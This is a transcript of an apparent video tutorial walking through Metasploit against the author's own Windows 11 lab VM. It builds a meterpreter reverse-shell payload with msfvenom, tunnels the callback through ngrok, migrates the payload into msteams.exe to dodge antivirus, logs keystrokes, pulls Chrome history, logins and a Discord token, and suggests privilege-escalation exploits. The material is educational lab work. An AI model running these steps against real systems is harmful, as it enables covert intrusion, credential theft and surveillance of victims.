What is up, people? This is Teja, and in this video we're going to do Metasploit, which, as it claims here, the world's most used penetration testing framework. This is a must-have tool for any hacker or red teamer or penetration tester, and it's so cool. You can do a lot of things with Metasploit. You can generate payloads for different kinds of targets, different kinds of architectures. You can manage your shells, you can manage your target sessions, you can do a lot of post-exploitation. You can see if the target is vulnerable to different kinds of CVEs, and you can also exploit those CVEs from within those Metasploit if the target happens to be vulnerable. And there's just a lot that you can do with Metasploit. But in this video, I'm going to be showing you how to create payloads for different targets and how to catch those reverse shells that the payload generates when executed on the target. And then we'll also talk about the different things that you can do once you get a session on the target. So let's go ahead and get started. I'm going to be using Kasm Workspaces, which is a Docker streaming platform where you can basically run Docker apps, Docker images from within your web browser. What I'm going to do in this video is I'm going to create myself a portable, disposable hacking lab which runs Kali Linux, and I'll also be able to access it directly from my web browser with the help of Kasm Workspaces. Now, you don't have to do this if you already have Kali Linux installed on your virtual machine or just directly on your computer, but I like to use Kasm Workspaces because I like to have all my Docker apps in a workspace and then be able to use them directly from my web browser. And I also love the fact that I will be able to destroy my Docker app sessions whenever I like, whenever I'm done with doing my work. And I'll also be able to pause those sessions or resume those sessions. And yeah, it just gives me a lot of convenience and I love to use it. So I'm going to also show you how to install Kasm Workspaces first and then install Kali Linux inside it. And after that, we'll go ahead and explore Metasploit. So I have created an AWS EC2 instance on which I'm going to install Kasm. But if you want to install Kasm locally, you can do it on your local Linux machine as well. But just remember, the minimum system requirements is that you need to have at least 2 CPU cores and 4 gigs of memory and at least 50 gigs of SSD storage. So I've logged into my EC2 instance through MobaXterm, which is an SSH client. So I'm going to install Kasm. All I have to do is just execute these 4 commands. So I'm just going to copy these 4 commands, come over here and create a new file called install.sh. I'm going to paste these 4 commands inside this. I'll make it executable with chmod +x and simply just run it. This is going to take a little while, so I'm going to pause the video and be right back when Kasm is done installing. Okay, so when Kasm is done installing, you can see some credentials like this. And these are the default credentials that Kasm randomly generated for you. You can make a note of them. I'll just go back to my browser and copy my IP address of the EC2 instance. And then just go to https:// followed by my IP address. Click on Advanced and click on Proceed. If you're installing Kasm on your local Linux machine, then your IP address is going to be 127.0.0.1, or you can just type in https://localhost, and that should take you a page like this, which asks you to log in. Now, I'm going to go back and copy my default username, which is admin@kasm.local, and my default password. Click on login, and that is my Kasm Workspaces dashboard. I'll go to Workspaces, click on Add from Registry. I'm going to search for Kali Linux, which is right here. So I'll just click on Install and let that install. Once Kali is installed, I'll come back to Workspaces, click on Open Session in a new tab, click on Launch Session, and that is going to open up Kali Linux in a new session like this. So right here we have our own Kali Linux, which we are able to access from a web browser. Remember, this is a Docker container and it is not exposed to the internet. So we still need to find a way to route the incoming connections from the internet to the Metasploit console that we will be running inside Kali Linux. This is very important because when the target executes your payload, the payload is going to try to make a connection back to your command and control server, which is going to be your Kali Linux Docker container that you're running on your browser. But since this is not exposed to the internet, the payload running on the target cannot find it, hence you will not get any reverse shell. So in order to fix that, we'll make use of ngrok. So I'm just going to open up my Firefox web browser and then just go to ngrok.com. If you don't know what ngrok is, it is a tool that you can basically use to create secure tunnels. It's free to use, so that's awesome. So I'm just going to log into my account and I'll go ahead and download the 64-bit version of ngrok to my Kali Linux. Go to my downloads directory, and this is the downloaded file. Let me go ahead and try to unzip this. And here we have the ngrok executable. I'm going to make it as executable using the chmod +x command so that I'll be able to execute it. And after I do that, I also need to configure it with my authentication token. You will get your own unique authentication token, and you can find it on your dashboard when you're downloading ngrok. So just copy this command, which contains your authentication token, and just paste it in your terminal, and that should be good to go. Awesome. So now I'll create a tunnel using ngrok. So I'll say ngrok TCP because I'm going to create a TCP tunnel, and I'm going to use the port 1560. What this is going to do is it's going to tunnel all the traffic from outside to the local host of this particular container, which is the Kali Linux container on port 1560. So whatever traffic comes to our ngrok tunnel is going to be forwarded to our local host on port 1560. So I'm just going to hit enter, and it gives you an address like this followed by a port, which we will be making use of. Awesome. So I'm going to create a new tab over here. And now it's time to generate a payload using MSF Venom, which is a submodule of Metasploit, if you'd like to call it that way. My target in this video is going to be a Windows 11 machine. So I'm going to create or generate a payload with MSF Venom for Windows 11 64-bit target. So let me do that. I'll type in MSF Venom space -p to specify which payload that I want to use. I want to use Windows /x64 /meterpreter /reverse _ TCP. This is the name of the payload for a Windows target on 64-bit version. And then I'm going to specify the L host, which is going to be my ngrok address, which is 6.tcp.ngrok.io. It may vary in your case, so just copy it from your ngrok output and then paste it here. And I also need to give the L port, which is going to be this random port that ngrok generated. I'm going to copy this port and paste it here. And I want it in an exe format. So I'm going to specify the file extension as exe, and I'm going to name this as payload.exe. Let's go ahead and hit enter, and this is going to create our payload. There you go. The payload is created. The final size is 7,168 bytes. If I type in lsl, you can see we have payload.exe. Okay, I've transferred the payload.exe to my target. Before I go ahead and execute it, I need to set up a listener on my MSF console. So I'll go back to my Kasm Workspaces, to my Kali Linux container. And here I'm going to type in MSF console to enter MSF console. And first of all, I'm going to type in use exploit /multi/handler. And what this is going to do is it's going to give me a command line access to the target once we get a session. And you will also be able to manage multiple payload types, multiple sessions from your numerous targets, all from within your multi-handler. So the next step is to set the payload type, and this should exactly match the payload that you have generated with MSF Venom. So I'm going to say set payload and mention the payload that I have used, which is Windows x64 meterpreter reverse _ TCP. This is the payload. This is the same exact payload that I've used, and I'm going to use it again. Then you can just type in show options to see the different kind of options that exist for this payload. And there are two options that are absolutely required, which is going to be L host, which is the listening host, and L port, which is the listening port. So we're going to change the L host. We're going to set it to 127.0.0.1 because remember, our ngrok tunnel is routing all the traffic from the internet to our local host on port 1560. So I can just type in 127.0.0.1 or just type in localhost. It's the same. And then I'm going to also set the port, which is going to be 1560 because that is where ngrok is routing all the traffic to. And that's it. We are all done. In order to start the listener, to receive the connection from the target, I'll just type in run. And you can see the TCP handler is started and it is listening on 127.0.0.1 port 1560. I'll go back to my Windows 11 target and I'll execute this payload and let's see what happens. Okay, let's come back to the MSF console. And there you go. You can see it says that a session has opened. But before this step, you can also see another step that says sending stage. Now this stage is actually the malicious part that allows you to have command line access on the target. So what basically happened is when I executed this payload.exe, it connected back to my MSF console listener on my Kali Linux, and once the connection is received, it sent a stage which contains the actual malicious code that makes all of this possible, that makes it possible to have command line access and to have other different kinds of access over the target. Now we have a Metasploit session. And if I type in a question mark, you can see the different kinds of commands that we can execute on the target right now. So let's see what we have here. We can do cat to read the contents of a file. We can do delete to delete specific files. We can list the directories, download a file or directory from the target to our local computer, or in this case to our Kali Linux, and different kinds of stuff. You can feel free to use the Metasploit shell, but I like to use the traditional command line interface, the command shell that is traditional on Windows, right? So now to go into that command shell, I'll just type in shell, and that's going to drop me to an actual command shell on the target computer. And now I can execute all the commands that you can execute on a command prompt. For example, if I type in dir, it's going to list out all the files on in the current directory. For example, if I want to go to the C drive, I'll just say cdc or cdc like that. Yeah, there you go. Now I am in the C drive. So I can browse files like this. And if I want to download a file, let's see. There are some files in the downloads directory. So if I want to download any files from the target, the easiest way would be to use the Metasploit shell. So in order to go back to the Metasploit shell, I'll just hold Ctrl Z on my keyboard, which is going to background this channel. And now I'm back into the Metasploit shell, and I'll make use of the download command to download a file or directory. Let's say we want to download passcodes.kdbx. So I'm going to do download followed by the path of the file that you want to download, and I want to download it to the current directory, right? And let's see, there you go. The download has completed and it's saved to this path on my Kali Linux. So in this way, I'll be able to download files to the computer. Same way, I'll also be able to upload files to the computer using the upload command. Another cool thing that you can do is you can actually list running processes on the target by making use of the ps command. Let's do that. I'm going to say ps, and this is going to list out all the processes, all the current running processes on the target. Here is something interesting. You can actually migrate your payload process, your malicious payload process that is running on the target, to another process that is already running on the target computer. For example, there is a process called msteams.exe. What I can do is I can migrate my current payload to this new process to bypass antivirus detection. So all I have to do is I'll have to just copy this process ID, the PID, and I'll just make use of the command called migrate followed by the PID of the process to which I want to migrate. So let's hit enter, and fingers crossed, let's hope it works. There you go. The migration has completed successfully. And now my payload, the malicious payload that I've generated, is no longer running as a separate process on the target. It's a part of the msteams.exe process, which is the process that is responsible for Microsoft Teams. So in this way, you can actually even become invisible. You can become stealthy. That's awesome, isn't it? So let's see other things that we can do. Let's look at keyscan_dump. So you can actually lock the keyboard strokes on the target, and I'm going to make use of the command called keyscan_start, which is going to start listening for keystrokes on the target. There you go. Now if I just go back to my Windows machine, let's open up a notepad to type something, and let me type hello, this is a test, here is my super secret password. All right, so I've typed something. Let me go back to my MSF console. I'll say keyscan underscore stop to stop the keylog attack. And then to dump all the keys that we have collected, I'll make use of keyscan underscore dump. Okay, it did not work. Let's try that again. Keyscan underscore start. Let's see. Hello, this is a test. Dot, something like that. And let's go back. Keyscan underscore dump. Okay, there you go. It worked. So it turns out that you have to use keyscan underscore dump before you use keyscan underscore stop. That's when this works. You can see these are the keystrokes that I've typed, and I'm able to successfully retrieve them. So in a way, it comes with a keylogger inbuilt. You can record the target's keystrokes, which might contain obviously sensitive information. If the target is, let's say, logging into a website, he's going to type in his username and password, and by making use of this keyscan attack, you can actually collect that information. All this is awesome, but let's also look at some of the post-exploitation modules. Metasploit is much more than just receiving reverse shells and accessing the target and executing these different types of commands that are supported on the Metasploit shell. It's much more than that. For example, I can go ahead and enumerate all the installed applications on the target by making use of a specific Metasploit module. Metasploit has lots of modules which do different kinds of things. Each module does a different kind of thing for a different target, and you can use these modules to enumerate interesting stuff, and sometimes you can even exploit the loopholes that you have found during the enumeration phase. So let me go ahead and background my Metasploit shell. I'll just say Control Z to background this session. There you go, and I'm going to search for enum underscore applications, which is a Metasploit module. So there you go, post/windows/gather enum applications. This is the module that I want to use. So I'm going to say use followed by 0 because the number for it is 0, or you can just say, you can just copy paste this whole thing, whichever you want. I'm just going to copy this thing. There you go. If I say show options, this is the option that it requires. We only have one session right now. You can list all your sessions by saying sessions, and it's going to list out all the sessions. I only have one session, and the ID of that session is 1. So I'm going to set the session to 1. Set session 1, and that's it. Now if I just hit run, it's going to execute this particular module on the target. And just like that, we have all the installed applications on the target system. These are all the installed applications. So there are lots of modules like this that you can use. For example, let's use another one. Let's say search for enum Chrome. This is the module that I want to use. So basically, it's going to try to collect all the saved passwords, saved credentials from the Google Chrome browser that is running on the target. So let's see what options it has. It also has session. So I'm going to say set session 1. I'm going to run this. So it's going to download different kinds of information from the Google Chrome browser. It's going to download all the cookies. It's going to download all the bookmarks, history, all the login data. Let's see what we have here. It's said that it has downloaded the history, the browsing history. So I'm just going to open this file. I'll open up a new tab and just cat this file since it's just a text file. There you go. It contains the links, all the history, all the websites, all the web addresses that the victim has visited. Basically, we are able to steal the Google Chrome history of the target. And similarly, what else we have? We have login data. That sounds interesting, but I'm not sure if we'll have anything interesting in here because I've never used Google Chrome on the Windows 11 VM. So let's see anyway. Okay, it was able to fetch my Discord, which I now remember signing into from the Google Chrome browser. You're probably not going to see this because I'm going to blur it out, but here is my email address for the Discord account. It was able to gather it. And I'm pretty sure if I look closely enough here, I'll also be able to find the Discord secret token, which if I have access to, I'll just be able to log in to the Discord account without having to enter the username or the email and the password. So yeah, that's scary. The last thing that I would like to show, which is really cool, is now that I have a shell does not mean that I have complete administrator level access on the computer. I will only have the administrator level access on the target if the user who has executed my payload is an administrator, which may not always be true. So in that case, we will be looking for ways to escalate our privileges to administrator. And the way of doing that is to look for vulnerable software which might allow us to escalate our privileges. We can automate all of this by making use of something known as local exploit suggester. So I'm going to background my Metasploit session again. I'm going to search for local exploit suggester. There you go. Post/multi/recon local exploit suggester. I'm going to use that. Use this module, show the options. So I'm going to set the session to 2 and run it. And now I'll just sit back and wait to see if this module is able to gather any potential privilege escalation vectors that I can potentially use to escalate my privileges to an administrator. And you can see the target appears to be vulnerable to at least 3 exploits. These are the 3 exploits that we can use to potentially escalate our privileges to root or administrator. And it also shows you the corresponding module that you can use to exploit that particular vulnerability, which is awesome, isn't it? So there is a vast range of things that you can do with Metasploit. It's not only limited to getting reverse shells, you can also use the different modules that it has to exploit different vulnerabilities on different targets. So that'll be all for this video. Hope you liked it, hope you enjoyed it, hope you learned something new. If you did like this video, please do not forget to leave a thumbs up below and also leave a comment in the comment section. If you're not yet a subscriber, please do hit that subscribe button and also turn on the bell icon to receive instant updates from me. I'll see you in the next video. Until then, cheers.